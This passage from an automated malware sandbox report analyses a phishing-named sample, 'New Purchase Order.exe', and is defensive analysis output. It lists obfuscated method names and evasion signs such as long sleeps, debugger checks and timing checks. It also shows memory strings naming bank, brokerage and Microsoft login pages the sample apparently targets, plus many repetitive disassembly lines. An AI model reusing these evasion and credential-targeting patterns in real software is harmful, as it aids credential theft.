                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, Gc3jjeWwGSVKABX6Om.csHigh entropy of concatenated method names: 'YjHnCwNpyn', 'AksntJTbKa', 'KDen5pWv3o', 'aK4nL98Bbo', 'vgvnvgrIY0', 'qfyngBlHrB', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, x9KwdfT83fQ1H75NjQ.csHigh entropy of concatenated method names: 'byvF1LUJ0D', 'qfUF9ok5Xw', 'YxHFqlwGBI', 'swDFCoeAt6', 'fASFtDr4K2', 'pC6F5R4lxC', 'bTaFLa29yB', 'hMjFgyOHeM', 'OtuFrBBHqO', 'nOdFBnlA0A'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, i1dJkMNKchLyGeCdJgf.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XLYnjk2QH9', 'SnPnuw2N8f', 'vtTnlJS5ah', 'kNOnPV6a0J', 't39nSlBGsK', 'Jt9nkWEPmh', 'Tt8nYbgheY'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, WmYmHENZyiGT0eMgOOs.csHigh entropy of concatenated method names: 'ToString', 'lPhb2GDtj3', 'xRYbAUeJgO', 'KNAbyZl73J', 'xpZbiVVfG6', 'N5mb8e24jT', 'jlSb3TaAca', 'KPMbUyoQI9', 'UfOvq8ZLJo1ZxdQbuxT', 'lDoSRmZ7kUdaqW1c45V'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, eUS8jiZ7pjHcURfoBY.csHigh entropy of concatenated method names: 'mThWcDjII', 'lSPwOcInq', 's0FRPwic8', 'O5Y4hEIJh', 'T4bAP3IQZ', 'V65ynhK33', 'bWgN7pMPFpkscOoS2I', 'JN7UAd06KDTVID4U26', 'Feixlj10W', 'c6EnIVW6c'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, qBso1MOw31GWhUC20M.csHigh entropy of concatenated method names: 'rnT51DynCd', 'dN85q51REC', 'lIM5txrZfE', 'wcx5LCl6p6', 'fx95gcA25T', 'eX3tprjgAi', 'v7EtEsc9LL', 'QK7tThunTe', 'qujt6CTdCb', 'qLPtHAsQI3'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, uweqMCf0DYL2rcC882.csHigh entropy of concatenated method names: 'gpx7BhhnTQ', 'kBB7eCDqgq', 'ToString', 'zre79f9r76', 'Ti37q0fNEA', 'Ia57CMlFDa', 'dhR7tTyLkp', 'JI175GgoyD', 'xnB7L18W4T', 'UDe7gRWot2'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, ElvdeJI60fGkFAveCY.csHigh entropy of concatenated method names: 'hqcvD1HUdH', 'okjv7IpSJ5', 'ybXvvDdWJK', 'AJevbWpoRj', 'WTWv0Nyybe', 'aC7vQrgJ4N', 'Dispose', 'lJfx9TH2Gt', 'BKNxqQ1HCO', 'xuQxCcqEev'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, BQb46HyRu1p84y2ymB.csHigh entropy of concatenated method names: 'o74DJ3Oucs', 'dEsDugePmc', 'nTlDPQIMwg', 'LllDStDxsi', 'M6UD8HxNwa', 'ySID36aQUO', 'QKpDUhWPGt', 'SQxDZl7Wgo', 'bmBDMF5E2n', 'pisDsIJANP'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, EQ36o52QR78S2TY0Nr.csHigh entropy of concatenated method names: 'QNHLVMqr7H', 'r45LN6U3cX', 'aSyLWqD862', 'D40LwLNcqI', 'wP3LdUlOSt', 'P4qLRbduj5', 'IijL4l4XwX', 'qxZL2HOVlc', 'MvELAGN84C', 'pBeLyZK92l'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, sWMmMCzjFcaHdo9GIV.csHigh entropy of concatenated method names: 'XPanRIjpfE', 'I4tn23yUnq', 'tbPnAyUmNq', 'B9cnigFeky', 'l2vn804T4a', 'hU0nUsvAac', 'cD1nZJ0pPV', 'ifHnQSo4FM', 'pDdnVuVjo3', 'Rk5nNIiQYh'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, DkYhVYHL5JxUdqiDtq.csHigh entropy of concatenated method names: 'fnJCw4dSTB', 'wX7CRLSb3E', 'Gd2C2sh7Dy', 'TTxCAIM89D', 'sg0CDhp3UN', 'HQMCIXvZ2D', 'MHOC7UhBgi', 'D5oCx5e8QV', 'cqBCvMrINy', 'Vp0CnJsX9q'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, zdnbOrNNHt6v851ld1o.csHigh entropy of concatenated method names: 'wS1nKGV2CW', 'xM3nzRNkec', 'L1nbowVAMB', 'h2pbmKo6uE', 'ia4baeGS7c', 'xQMbFwEaso', 'iSabGjOYBP', 'Q9pb1WpaZy', 'nFfb9YhVkx', 'JZQbq3Dl0T'
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: New Purchase Order.exe PID: 7668, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D324
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D944
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D504
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D544
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF908190154
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: D20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 29D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 2810000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 4EE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 5EE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 6010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 7010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 9C20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: AC20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: B0B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: C0B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0188096E rdtsc 3_2_0188096E
                Source: C:\Users\user\Desktop\New Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeWindow / User API: threadDelayed 9670Jump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\tzutil.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\New Purchase Order.exe TID: 7696Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 2532Thread sleep count: 303 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 2532Thread sleep time: -606000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 2532Thread sleep count: 9670 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 2532Thread sleep time: -19340000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001DC9D0 FindFirstFileW,FindNextFileW,FindClose,8_2_001DC9D0
                Source: UQ63g7r-.8.drBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: UQ63g7r-.8.drBinary or memory string: global block list test formVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: UQ63g7r-.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: UQ63g7r-.8.drBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: UQ63g7r-.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027ED000.00000004.00000020.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2611412661.000000000063F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: UQ63g7r-.8.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: UQ63g7r-.8.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: firefox.exe, 0000000B.00000002.2241672791.000001D803D4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: UQ63g7r-.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: UQ63g7r-.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: UQ63g7r-.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: AMC password management pageVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: UQ63g7r-.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: UQ63g7r-.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: UQ63g7r-.8.drBinary or memory string: discord.comVMware20,11696497155f
                Source: UQ63g7r-.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: UQ63g7r-.8.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: UQ63g7r-.8.drBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: UQ63g7r-.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: UQ63g7r-.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: UQ63g7r-.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00417B63 LdrLoadDll,3_2_00417B63
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018FC188 mov eax, dword ptr fs:[00000030h]3_2_018FC188
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01880185 mov eax, dword ptr fs:[00000030h]3_2_01880185
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E4180 mov eax, dword ptr fs:[00000030h]3_2_018E4180
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C019F mov eax, dword ptr fs:[00000030h]3_2_018C019F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183A197 mov eax, dword ptr fs:[00000030h]3_2_0183A197
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019061C3 mov eax, dword ptr fs:[00000030h]3_2_019061C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BE1D0 mov eax, dword ptr fs:[00000030h]3_2_018BE1D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BE1D0 mov ecx, dword ptr fs:[00000030h]3_2_018BE1D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019161E5 mov eax, dword ptr fs:[00000030h]3_2_019161E5
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018701F8 mov eax, dword ptr fs:[00000030h]3_2_018701F8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE10E mov eax, dword ptr fs:[00000030h]3_2_018EE10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE10E mov ecx, dword ptr fs:[00000030h]3_2_018EE10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01900115 mov eax, dword ptr fs:[00000030h]3_2_01900115
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EA118 mov ecx, dword ptr fs:[00000030h]3_2_018EA118
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EA118 mov eax, dword ptr fs:[00000030h]3_2_018EA118
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01870124 mov eax, dword ptr fs:[00000030h]3_2_01870124
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D4144 mov eax, dword ptr fs:[00000030h]3_2_018D4144
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D4144 mov ecx, dword ptr fs:[00000030h]3_2_018D4144
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01846154 mov eax, dword ptr fs:[00000030h]3_2_01846154
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183C156 mov eax, dword ptr fs:[00000030h]3_2_0183C156
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D8158 mov eax, dword ptr fs:[00000030h]3_2_018D8158
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914164 mov eax, dword ptr fs:[00000030h]3_2_01914164
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184208A mov eax, dword ptr fs:[00000030h]3_2_0184208A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018380A0 mov eax, dword ptr fs:[00000030h]3_2_018380A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D80A8 mov eax, dword ptr fs:[00000030h]3_2_018D80A8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019060B8 mov eax, dword ptr fs:[00000030h]3_2_019060B8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019060B8 mov ecx, dword ptr fs:[00000030h]3_2_019060B8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C20DE mov eax, dword ptr fs:[00000030h]3_2_018C20DE
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0183A0E3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C60E0 mov eax, dword ptr fs:[00000030h]3_2_018C60E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018480E9 mov eax, dword ptr fs:[00000030h]3_2_018480E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183C0F0 mov eax, dword ptr fs:[00000030h]3_2_0183C0F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018820F0 mov ecx, dword ptr fs:[00000030h]3_2_018820F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C4000 mov ecx, dword ptr fs:[00000030h]3_2_018C4000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h]3_2_018E2000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h]3_2_018E2000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h]3_2_018E2000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h]3_2_018E2000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h]3_2_018E2000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h]3_2_018E2000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h]3_2_018E2000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h]3_2_018E2000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185E016 mov eax, dword ptr fs:[00000030h]3_2_0185E016
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185E016 mov eax, dword ptr fs:[00000030h]3_2_0185E016
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185E016 mov eax, dword ptr fs:[00000030h]3_2_0185E016
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185E016 mov eax, dword ptr fs:[00000030h]3_2_0185E016
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183A020 mov eax, dword ptr fs:[00000030h]3_2_0183A020
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183C020 mov eax, dword ptr fs:[00000030h]3_2_0183C020
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D6030 mov eax, dword ptr fs:[00000030h]3_2_018D6030
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01842050 mov eax, dword ptr fs:[00000030h]3_2_01842050
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C6050 mov eax, dword ptr fs:[00000030h]3_2_018C6050
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186C073 mov eax, dword ptr fs:[00000030h]3_2_0186C073
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186438F mov eax, dword ptr fs:[00000030h]3_2_0186438F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186438F mov eax, dword ptr fs:[00000030h]3_2_0186438F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183E388 mov eax, dword ptr fs:[00000030h]3_2_0183E388
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183E388 mov eax, dword ptr fs:[00000030h]3_2_0183E388
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183E388 mov eax, dword ptr fs:[00000030h]3_2_0183E388
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01838397 mov eax, dword ptr fs:[00000030h]3_2_01838397
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01838397 mov eax, dword ptr fs:[00000030h]3_2_01838397
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01838397 mov eax, dword ptr fs:[00000030h]3_2_01838397
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018FC3CD mov eax, dword ptr fs:[00000030h]3_2_018FC3CD
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A3C0 mov eax, dword ptr fs:[00000030h]3_2_0184A3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A3C0 mov eax, dword ptr fs:[00000030h]3_2_0184A3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A3C0 mov eax, dword ptr fs:[00000030h]3_2_0184A3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A3C0 mov eax, dword ptr fs:[00000030h]3_2_0184A3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A3C0 mov eax, dword ptr fs:[00000030h]3_2_0184A3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A3C0 mov eax, dword ptr fs:[00000030h]3_2_0184A3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018483C0 mov eax, dword ptr fs:[00000030h]3_2_018483C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018483C0 mov eax, dword ptr fs:[00000030h]3_2_018483C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018483C0 mov eax, dword ptr fs:[00000030h]3_2_018483C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018483C0 mov eax, dword ptr fs:[00000030h]3_2_018483C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C63C0 mov eax, dword ptr fs:[00000030h]3_2_018C63C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE3DB mov eax, dword ptr fs:[00000030h]3_2_018EE3DB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE3DB mov eax, dword ptr fs:[00000030h]3_2_018EE3DB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE3DB mov ecx, dword ptr fs:[00000030h]3_2_018EE3DB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE3DB mov eax, dword ptr fs:[00000030h]3_2_018EE3DB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E43D4 mov eax, dword ptr fs:[00000030h]3_2_018E43D4
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E43D4 mov eax, dword ptr fs:[00000030h]3_2_018E43D4
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018503E9 mov eax, dword ptr fs:[00000030h]3_2_018503E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018503E9 mov eax, dword ptr fs:[00000030h]3_2_018503E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018503E9 mov eax, dword ptr fs:[00000030h]3_2_018503E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018503E9 mov eax, dword ptr fs:[00000030h]3_2_018503E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018503E9 mov eax, dword ptr fs:[00000030h]3_2_018503E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018503E9 mov eax, dword ptr fs:[00000030h]3_2_018503E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018503E9 mov eax, dword ptr fs:[00000030h]3_2_018503E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018503E9 mov eax, dword ptr fs:[00000030h]3_2_018503E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185E3F0 mov eax, dword ptr fs:[00000030h]3_2_0185E3F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185E3F0 mov eax, dword ptr fs:[00000030h]3_2_0185E3F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185E3F0 mov eax, dword ptr fs:[00000030h]3_2_0185E3F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018763FF mov eax, dword ptr fs:[00000030h]3_2_018763FF
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187A30B mov eax, dword ptr fs:[00000030h]3_2_0187A30B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187A30B mov eax, dword ptr fs:[00000030h]3_2_0187A30B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187A30B mov eax, dword ptr fs:[00000030h]3_2_0187A30B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183C310 mov ecx, dword ptr fs:[00000030h]3_2_0183C310
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01860310 mov ecx, dword ptr fs:[00000030h]3_2_01860310
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190A352 mov eax, dword ptr fs:[00000030h]3_2_0190A352
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C035C mov eax, dword ptr fs:[00000030h]3_2_018C035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C035C mov eax, dword ptr fs:[00000030h]3_2_018C035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C035C mov eax, dword ptr fs:[00000030h]3_2_018C035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C035C mov ecx, dword ptr fs:[00000030h]3_2_018C035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C035C mov eax, dword ptr fs:[00000030h]3_2_018C035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C035C mov eax, dword ptr fs:[00000030h]3_2_018C035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E8350 mov ecx, dword ptr fs:[00000030h]3_2_018E8350
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E437C mov eax, dword ptr fs:[00000030h]3_2_018E437C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E284 mov eax, dword ptr fs:[00000030h]3_2_0187E284
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E284 mov eax, dword ptr fs:[00000030h]3_2_0187E284
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C0283 mov eax, dword ptr fs:[00000030h]3_2_018C0283
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C0283 mov eax, dword ptr fs:[00000030h]3_2_018C0283
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C0283 mov eax, dword ptr fs:[00000030h]3_2_018C0283
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018502A0 mov eax, dword ptr fs:[00000030h]3_2_018502A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018502A0 mov eax, dword ptr fs:[00000030h]3_2_018502A0
